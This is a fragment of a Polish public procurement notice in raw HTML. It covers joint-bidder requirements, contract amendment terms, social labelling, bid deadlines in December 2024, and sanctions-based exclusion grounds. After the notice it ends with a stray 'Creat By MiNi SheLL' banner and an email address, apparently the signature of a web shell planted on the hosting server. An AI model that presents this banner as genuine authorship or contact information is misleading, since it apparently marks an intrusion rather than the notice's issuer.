<span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,<br/>6.1 W przypadku składania oferty wspólnej przez kilku wykonawców, każdy <br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia musi złożyć dokumenty i oświadczenia wskazane w rozdziale V pkt. 2.1., VI.2.1 i VI.2.2<br/>Pozostałe dokumenty będą traktowane jako wspólne.<br/>6.2.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do OFERTY należy dołączyć stosowne pełnomocnictwo w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę lub osoby upoważnione do składania oświadczeń woli każdego <br/>z wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>6.3.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego.<br/>6.4.	Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem. <br/>6.5.	W formularzu OFERTA w miejscu „nazwa i adres wykonawcy” należy<br/> wpisać dane dotyczące wszystkich podmiotów wspólnie ubiegających<br/> się o udzielenie zamówienie, a nie tylko pełnomocnika.<br/>6.6.	W formularzu OFERTA należy wskazać, które usługi wykonają poszczególni wykonawcy wspólnie ubiegający się o udzielenie zamówienia.<br/>6.7. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań.<br/>6.8.	Przed podpisaniem umowy od Wykonawców ubiegających się wspólnie o zamówienie publiczne, których oferta została wybrana Zamawiający będzie żądać umowy regulującej ich współpracę.<br/>Szczegółowo opisano w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikami do SWZ<br/> 2 a. Projektowane postanowienia umowy w sprawie zamówienia publicznego dla części nr 1<br/>2 b. Projektowane postanowienia umowy w sprawie zamówienia publicznego dla części nr 2<br/>2 c. Projektowane postanowienia umowy w sprawie zamówienia publicznego dla części nr 3 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie żądania określonej etykiety lub wskazania mającego zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustawy: - etykiety społecznej</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-03 10:50</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ZETOPZP: https://pzp.hyzne.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-03 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 4. Podstawy wykluczenia o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (zwanej dalej ustawą o szczególnych rozwiązaniach)<br/>4.1. Zamawiający wykluczy wykonawcę na podstawie art. 7 ust. 1 ustawy <br/>o szczególnych rozwiązaniach w przypadku wystąpienia którejkolwiek <br/>z określonych w niej przesłanek, tj:<br/>4.1.1 wymienionego w wykazach określonych w rozporządzeniu 765/2006 <br/>i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy o szczególnych rozwiązaniach;<br/>4.1.2 którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006<br/> i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 Ustawy o szczególnych rozwiązaniach ;<br/>4.1.3 którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3. Ustawy o szczególnych rozwiązaniach .<br/>4.2. W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia o których mowa w art. 7 ust. 1 ustawy o szczególnych rozwiązaniach Zamawiający nie wymaga żadnych podmiotowych środków dowodowych

Creat By MiNi SheLL
Email: jattceo@gmail.com